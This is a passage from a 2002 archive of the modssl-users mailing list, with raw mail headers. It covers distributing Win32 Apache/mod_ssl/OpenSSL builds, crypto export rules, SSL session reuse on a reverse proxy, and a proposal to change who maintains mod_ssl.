My server is managing and there have been fairly frequent downloads -- I 
am not concerned yet.  I will have to remove the files if it looks as 
though I will exceed my upload limit.  My original concerns are probably 
unwarranted.

The files are not that large, so if you can endure the slow download, 
you are all welcome to help yourselves.

Jim, the build is ok then?  You have it up and running?

Chris.





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:09:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA09208; Wed, 25 Sep 2002 07:08:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id HAA09203; Wed, 25 Sep 2002 07:07:11 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8P56uev000716
	for ; Wed, 25 Sep 2002 01:06:56 -0400
Date: Wed, 25 Sep 2002 01:06:56 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
In-Reply-To: <3D9143B3.4030002@sympatico.ca>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 25 Sep 2002, hunter wrote:

> My server is managing and there have been fairly frequent downloads -- I
> am not concerned yet.  I will have to remove the files if it looks as
> though I will exceed my upload limit.  My original concerns are probably
> unwarranted.

Why not just upload it to the contrib area at modssl.org?

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:44:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA09617; Wed, 25 Sep 2002 07:43:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts26-srv.bellnexxia.net id HAA09611; Wed, 25 Sep 2002 07:42:52 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts26-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020925054247.SRHC21425.tomts26-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 25 Sep 2002 01:42:47 -0400
Message-ID: <3D914CDE.5050606@sympatico.ca>
Date: Wed, 25 Sep 2002 01:42:54 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cliff Woolley wrote:
> On Wed, 25 Sep 2002, hunter wrote:
> 
> 
>>My server is managing and there have been fairly frequent downloads -- I
>>am not concerned yet.  I will have to remove the files if it looks as
>>though I will exceed my upload limit.  My original concerns are probably
>>unwarranted.
> 
> 
> Why not just upload it to the contrib area at modssl.org?
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Cliff,

I have tried.  I am not sure whether I am doing something wrong or the 
page is broken.  I will try again, but each time I try to FTP, the write 
fails.

I am open to any suggestions.  I sent Ralf a note but he has not 
replied.  I should have sent a note to you ... :-)

Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:50:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA09810; Wed, 25 Sep 2002 07:49:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id HAA09801; Wed, 25 Sep 2002 07:48:09 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8P5k5q0001015
	for ; Wed, 25 Sep 2002 01:46:05 -0400
Date: Wed, 25 Sep 2002 01:46:05 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: [ATTN RALF] Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
In-Reply-To: <3D914CDE.5050606@sympatico.ca>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 25 Sep 2002, hunter wrote:

> I am open to any suggestions.  I sent Ralf a note but he has not
> replied.  I should have sent a note to you ... :-)

I don't have any more access to modssl.org than you do, unfortunately...
:-/  If it were apache.org, that would be another matter.  But there's a
reason we can't distribute crypto binaries from apache.org -- if we could,
we would.  Guess we wait for Ralf to check up on the contrib area.

Thanks,
--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:51:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA09826; Wed, 25 Sep 2002 07:50:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id HAA09811; Wed, 25 Sep 2002 07:49:13 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id BAA28074
	for ; Wed, 25 Sep 2002 01:20:45 -0400
Message-ID: <002001c26456$d7e3f0c0$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References:  <3D914CDE.5050606@sympatico.ca>
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 25 Sep 2002 01:46:01 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you'd like, I'd be more than happy to host the file for download on my
network
----- Original Message -----
From: "hunter" 
To: 
Sent: Wednesday, September 25, 2002 1:42 AM
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip


> Cliff Woolley wrote:
> > On Wed, 25 Sep 2002, hunter wrote:
> >
> >
> >>My server is managing and there have been fairly frequent downloads -- I
> >>am not concerned yet.  I will have to remove the files if it looks as
> >>though I will exceed my upload limit.  My original concerns are probably
> >>unwarranted.
> >
> >
> > Why not just upload it to the contrib area at modssl.org?
> >
> > --Cliff
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> Cliff,
>
> I have tried.  I am not sure whether I am doing something wrong or the
> page is broken.  I will try again, but each time I try to FTP, the write
> fails.
>
> I am open to any suggestions.  I sent Ralf a note but he has not
> replied.  I should have sent a note to you ... :-)
>
> Chris.
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:53:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA09965; Wed, 25 Sep 2002 07:52:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts9-srv.bellnexxia.net id HAA09887; Wed, 25 Sep 2002 07:51:07 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253]) by tomts9-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020925055105.ZHTQ10370.tomts9-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 25 Sep 2002 01:51:05 -0400
Message-ID: <3D914ECD.7040001@sympatico.ca>
Date: Wed, 25 Sep 2002 01:51:09 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
References:  <3D914CDE.5050606@sympatico.ca>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

hunter wrote:
> Cliff Woolley wrote:
> 
>> On Wed, 25 Sep 2002, hunter wrote:
>>
>>
>>> My server is managing and there have been fairly frequent downloads -- I
>>> am not concerned yet.  I will have to remove the files if it looks as
>>> though I will exceed my upload limit.  My original concerns are probably
>>> unwarranted.
>>
>>
>>
>> Why not just upload it to the contrib area at modssl.org?
>>
>> --Cliff
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
> 
> Cliff,
> 
> I have tried.  I am not sure whether I am doing something wrong or the 
> page is broken.  I will try again, but each time I try to FTP, the write 
> fails.
> 
> I am open to any suggestions.  I sent Ralf a note but he has not 
> replied.  I should have sent a note to you ... :-)
> 
> Chris.
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
Cliff,

I did try again ... seems to work this time. ???

And ... someone else must have put the binaries there as well
... but I didn't overwrite them.

Thanks for the nudge...

Chris.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:55:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA10088; Wed, 25 Sep 2002 07:54:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id HAA10027; Wed, 25 Sep 2002 07:53:11 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g8P5p6bC001045
	for ; Wed, 25 Sep 2002 01:51:06 -0400
Date: Wed, 25 Sep 2002 01:51:06 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
In-Reply-To: <002001c26456$d7e3f0c0$6e01a8c0@cbs>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 25 Sep 2002, Ken Campney wrote:

> If you'd like, I'd be more than happy to host the file for download on my
> network

If you're in the states, you have to watch out for export restrictions...
other than that, fine by me. :)

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 08:10:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA10847; Wed, 25 Sep 2002 08:09:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts5-srv.bellnexxia.net id IAA10841; Wed, 25 Sep 2002 08:08:12 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253]) by tomts5-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020925060808.HLTI20369.tomts5-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 25 Sep 2002 02:08:08 -0400
Message-ID: <3D9152CE.8070201@sympatico.ca>
Date: Wed, 25 Sep 2002 02:08:14 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
References:  <3D914CDE.5050606@sympatico.ca> <002001c26456$d7e3f0c0$6e01a8c0@cbs>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ken Campney wrote:
> If you'd like, I'd be more than happy to host the file for download on my
> network
> ----- Original Message -----
> From: "hunter" 
> To: 
> Sent: Wednesday, September 25, 2002 1:42 AM
> Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> 

Ken, it is nice of you to offer.

http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

I just made the new Apache as well...

http://tor.ath.cx/~hunter/apache/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip

I also tried again to upload to ModSSL (again) and still cannot write 
the files there.

I am in Toronto.  I suppose I should pay more attention to the export 
rules - is Canada included?

Chris.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 08:11:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA10863; Wed, 25 Sep 2002 08:10:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id IAA10851; Wed, 25 Sep 2002 08:09:49 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id BAA28131
	for ; Wed, 25 Sep 2002 01:41:21 -0400
Message-ID: <004901c26459$b7170000$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References: 
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 25 Sep 2002 02:06:40 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

wow!

It's going to take longer than expected to find an answer to US export
issues, more exact what I need to do to protect myself  :-/ .

I'm going to look into this and as soon as I get a answer I'll let you know.

----- Original Message -----
From: "Cliff Woolley" 
To: 
Sent: Wednesday, September 25, 2002 1:51 AM
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip


> On Wed, 25 Sep 2002, Ken Campney wrote:
>
> > If you'd like, I'd be more than happy to host the file for download on
my
> > network
>
> If you're in the states, you have to watch out for export restrictions...
> other than that, fine by me. :)
>
> --Cliff
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 08:18:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA11155; Wed, 25 Sep 2002 08:17:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id IAA11149; Wed, 25 Sep 2002 08:16:53 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id BAA28155
	for ; Wed, 25 Sep 2002 01:48:20 -0400
Message-ID: <005b01c2645a$b334a040$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References:  <3D914CDE.5050606@sympatico.ca> <002001c26456$d7e3f0c0$6e01a8c0@cbs> <3D9152CE.8070201@sympatico.ca>
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 25 Sep 2002 02:13:02 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yea, it's international.

The US can export to Canada with no problems, but it becomes messy with
other countries.


----- Original Message -----
From: "hunter" 
To: 
Sent: Wednesday, September 25, 2002 2:08 AM
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip


> Ken Campney wrote:
> > If you'd like, I'd be more than happy to host the file for download on
my
> > network
> > ----- Original Message -----
> > From: "hunter" 
> > To: 
> > Sent: Wednesday, September 25, 2002 1:42 AM
> > Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> >
>
> Ken, it is nice of you to offer.
>
>
http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g
-Win32.zip
> http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip
>
> I just made the new Apache as well...
>
> http://tor.ath.cx/~hunter/apache/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip
>
> I also tried again to upload to ModSSL (again) and still cannot write
> the files there.
>
> I am in Toronto.  I suppose I should pay more attention to the export
> rules - is Canada included?
>
> Chris.
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 12:21:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA15998; Wed, 25 Sep 2002 12:20:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sogei.it id MAA15986; Wed, 25 Sep 2002 12:19:17 +0200 (MET DST)
Received: from hermes.sogei.it (hermes.sogei.it [26.2.193.51])
          by mail.sogei.it (8.11.4/8.8.4) with ESMTP
	  id g8P6xeH26287 for ; Wed, 25 Sep 2002 08:59:41 +0200
Received: from ccampetto2000 ([26.2.206.60])
          by hermes.sogei.it (Lotus Domino Release 5.0.9a)
          with SMTP id 2002092512083004:3555 ;
          Wed, 25 Sep 2002 12:08:30 +0200 
From: "Claudio Campetto" 
To: 
Subject: SSL proxy and session caching
Date: Wed, 25 Sep 2002 12:17:08 +0200
Message-ID: 
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-MIMETrack: Itemize by SMTP Server on Hermes/Sogei(Release 5.0.9a |January 7, 2002) at
 25/09/2002 12.08.30,
	Serialize by Router on Hermes/Sogei(Release 5.0.9a |January 7, 2002) at 25/09/2002
 12.18.30,
	Serialize complete at 25/09/2002 12.18.30
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Claudio Campetto" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I have the following problem. I configured Apache 2.0.40 + openssl
0.9.6g as a reverse proxy to a secure server (e.g. it receives http requests
from clients and sends https requests to the server), and got some
performance problems. I noticed that the https requests don't reuse SSL
sessions, and so one can get reasonable performances only with pages made of
few files. Does anybody know if there are simple workarounds to this
problem?
Thx in advance.
Claudio Campetto

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 16:00:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA22638; Wed, 25 Sep 2002 15:59:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id PAA22633; Wed, 25 Sep 2002 15:58:40 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=lttit)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17uCYf-0004tI-00
	for modssl-users@modssl.org; Wed, 25 Sep 2002 15:50:29 +0200
Date: Wed, 25 Sep 2002 15:50:29 +0200
From: Tim Tassonis 
To: modssl-users@modssl.org
Subject: Maintainership of mod_ssl
X-Mailer: Sylpheed version 0.8.2 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Ralf and everybody

Wouldn't it now be about time to transfer maintainership of mod_ssl to
somebody else (if there is anybody willing and capable available) , as
this software is now obviously unmaintained except for important security
fixes.

Ralf has done a tremendous job in providing and maintaining mod_ssl, but
obviously has no more time left to actively work on it.

But there are still people (me at least) who would like to enhance mod_ssl
beyond the very neccessary. Unfortunately mails with patches to do so are
not even replied.

How do other people and most of all, how does Ralf think about this?

Bye
Tim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 16:58:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA25898; Wed, 25 Sep 2002 16:57:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id QAA25892; Wed, 25 Sep 2002 16:56:46 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g8PEE4a24249
	for ; Wed, 25 Sep 2002 16:14:04 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Wed Sep 25 16:14:03 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Wed, 25 Sep 2002 16:14:03 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Wed, 25 Sep 2002 16:14:03 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Wed, 25 Sep 2002 16:14:03 +0200
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: Maintainership of mod_ssl
Date: Wed, 25 Sep 2002 16:14:02 +0200
Message-ID: 
Thread-Topic: Maintainership of mod_ssl
Thread-Index: AcJknB/XuYEAgQ6RQT2prJvfPaZSjQAAM5CA
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 25 Sep 2002 14:14:03.0030 (UTC) FILETIME=[CCE99B60:01C2649D]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA25893
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all

I agree, I haven't seen much movement/improvements with mod_ssl in the
last months and in this industry things need to get moving in order to
keep the software in touch with its neighbours (apache, open_ssl,
mod_authz_ldap to name a few) and therefore each one improving on the
other.  

If Ralf cannot afford the time then I am for someone else (like you
Tim) to take over the reigns (either fully or partially). It is really
important that users see mod_ssl constantly improving itself.

Best regards
Jose Correia



-----Original Message-----
From: Tim Tassonis [mailto:timtas@dplanet.ch]
Sent: 25 September 2002 15:50
To: modssl-users@modssl.org
Subject: Maintainership of mod_ssl


Hi Ralf and everybody

Wouldn't it now be about time to transfer maintainership of mod_ssl to
somebody else (if there is anybody willing and capable available) , as
this software is now obviously unmaintained except for important
security
fixes.

Ralf has done a tremendous job in providing and maintaining mod_ssl,
but
obviously has no more time left to actively work on it.

But there are still people (me at least) who would like to enhance
mod_ssl
beyond the very neccessary. Unfortunately mails with patches to do so
are
not even replied.

How do other people and most of all, how does Ralf think about this?

Bye
Tim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 17:19:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA27110; Wed, 25 Sep 2002 17:18:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id RAA27092; Wed, 25 Sep 2002 17:17:27 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 57B062BAF5; Wed, 25 Sep 2002 08:08:50 -0700 (PDT)
Date: Wed, 25 Sep 2002 08:08:50 -0700
From: daniel 
To: modssl-users@modssl.org
Subject: Re: Maintainership of mod_ssl
Message-ID: <20020925150850.GA5453@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: daniel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Part of the reson is that mod_ssl was moved into the Apache 2.0
codebase, development has been quite active there. 
So although 1.3 development may be necessary and useful, long term I think
2.0 is the way to go

Cheers

Daniel

> Hi all
> 
> I agree, I haven't seen much movement/improvements with mod_ssl in the
> last months and in this industry things need to get moving in order to
> keep the software in touch with its neighbours (apache, open_ssl,
> mod_authz_ldap to name a few) and therefore each one improving on the
> other.  
> 
> If Ralf cannot afford the time then I am for someone else (like you
> Tim) to take over the reigns (either fully or partially). It is really
> important that users see mod_ssl constantly improving itself.
> 
> Best regards
> Jose Correia
> 
> 
> 
> -----Original Message-----
